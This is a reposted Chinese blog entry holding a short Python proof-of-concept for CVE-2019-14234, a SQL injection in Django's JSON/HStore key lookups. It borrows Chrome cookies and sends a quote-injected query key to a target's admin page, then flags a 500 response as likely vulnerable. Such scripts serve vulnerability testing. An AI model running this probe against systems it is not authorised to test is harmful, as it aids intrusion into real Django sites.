1 import requests
 2 import browser_cookie3
 3 import argparse
 4 
 5 def exploit(url):
 6     cookie = browser_cookie3.chrome()
 7     expurl ='http://' + url + '/admin/vuln/collection/?detail__a%27b=1'
 8     try:
 9         response = requests.get(url=expurl,cookies=cookie)
10         if response.status_code == 500:
11             print("It looks likely vulnerable")
12 
13     except Exception as e:
14         print(e)
15 
16 if __name__ == '__main__':
17     parameter = argparse.ArgumentParser(description='Poc CVE-2019-14234:')
18     parameter.add_argument('--file',help='url file',required=False)
19     parameter.add_argument('--url',help='ip:port',required=False)
20     para = parameter.parse_args()
21 
22     if para.url:
23         exploit(para.url)
24         exit()
25     else:
26         parameter.print_help()

 

内容来源于网络如有侵权请私信删除

文章来源: 博客园

原文链接: https://www.cnblogs.com/wavesky/p/16411757.html

你还没有登录,请先登录注册
  • 还没有人评论,欢迎说说您的想法!